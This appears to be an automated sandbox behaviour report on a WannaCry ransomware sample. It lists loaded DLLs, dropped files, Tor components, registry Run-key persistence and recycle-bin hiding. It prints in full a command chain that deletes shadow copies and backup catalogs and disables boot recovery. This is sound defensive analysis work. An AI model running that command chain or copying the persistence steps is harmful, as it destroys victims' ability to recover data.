Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched32.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: libevent-2-0-5.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: libssp-0.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: libgcc_s_sjlj-1.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: libeay32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: ssleay32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: zlib1.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: libeay32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\taskse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\taskse.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\taskse.exe	Section loaded: winsta.dll
Source: C:\Users\user\Desktop\taskse.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mfc42.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched32.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Window found: window name: RICHEDIT

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: LisectAVT_2403002A_126.EXE.exe

Static file information: File size 3514376 > 1048576

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,

31_2_00404B70

Source: libeay32.dll.31.dr	Static PE information: section name: /4
Source: libeay32.dll.31.dr	Static PE information: section name: /19
Source: libeay32.dll.31.dr	Static PE information: section name: /31
Source: libeay32.dll.31.dr	Static PE information: section name: /45
Source: libeay32.dll.31.dr	Static PE information: section name: /57
Source: libeay32.dll.31.dr	Static PE information: section name: /70
Source: libeay32.dll.31.dr	Static PE information: section name: /81
Source: libeay32.dll.31.dr	Static PE information: section name: /92
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /4
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /19
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /31
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /45
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /57
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /70
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /81
Source: libevent-2-0-5.dll.31.dr	Static PE information: section name: /92
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /4
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /19
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /31
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /45
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /57
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /70
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /81
Source: libevent_core-2-0-5.dll.31.dr	Static PE information: section name: /92
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /4
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /19
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /31
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /45
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /57
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /70
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /81
Source: libevent_extra-2-0-5.dll.31.dr	Static PE information: section name: /92
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /4
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /19
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /31
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /45
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /57
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /70
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /81
Source: libgcc_s_sjlj-1.dll.31.dr	Static PE information: section name: /92
Source: libssp-0.dll.31.dr	Static PE information: section name: /4
Source: libssp-0.dll.31.dr	Static PE information: section name: /19
Source: libssp-0.dll.31.dr	Static PE information: section name: /31
Source: libssp-0.dll.31.dr	Static PE information: section name: /45
Source: libssp-0.dll.31.dr	Static PE information: section name: /57
Source: libssp-0.dll.31.dr	Static PE information: section name: /70
Source: libssp-0.dll.31.dr	Static PE information: section name: /81
Source: libssp-0.dll.31.dr	Static PE information: section name: /92
Source: ssleay32.dll.31.dr	Static PE information: section name: /4
Source: ssleay32.dll.31.dr	Static PE information: section name: /19
Source: ssleay32.dll.31.dr	Static PE information: section name: /31
Source: ssleay32.dll.31.dr	Static PE information: section name: /45
Source: ssleay32.dll.31.dr	Static PE information: section name: /57
Source: ssleay32.dll.31.dr	Static PE information: section name: /70
Source: ssleay32.dll.31.dr	Static PE information: section name: /81
Source: ssleay32.dll.31.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00413060 push eax; ret	31_2_0041308E
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00413060 push eax; ret	34_2_0041308E
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F9122E6 push ecx; ret	42_2_6F9122F9

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\m.vbs

Jump to behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Documents\@WanaDecryptor@.exe

Jump to dropped file

Uses bcdedit to modify the Windows boot settings

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\Public\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\taskdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\Default\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\taskse.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\found.001\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Desktop\u.wnry

Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD6EB4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD6EB5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD6EB6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD70CB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD70CC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD718D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD718E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD718F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD7190.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD7191.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD7192.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD7193.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD71A4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD71A5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SD71A6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SD71A7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SD71A8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD732B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD732C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD732D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD732E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD732F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD7340.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD7341.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD7342.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD7343.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD7344.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD7345.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD7346.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD758E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD758F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD7590.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD7591.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD7592.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD7593.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD75A4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD75A5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD75A6.tmp	Jump to behavior

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run njyalyugfohc920
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run njyalyugfohc920

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\$Recycle.Bin\~SD6D33.tmp

Jump to behavior

May use the Tor software to hide its network traffic

Source: @WanaDecryptor@.exe, 0000001F.00000003.1866830058.000000000295F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: onion-port

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		31_2_004067F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		34_2_004067F0

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
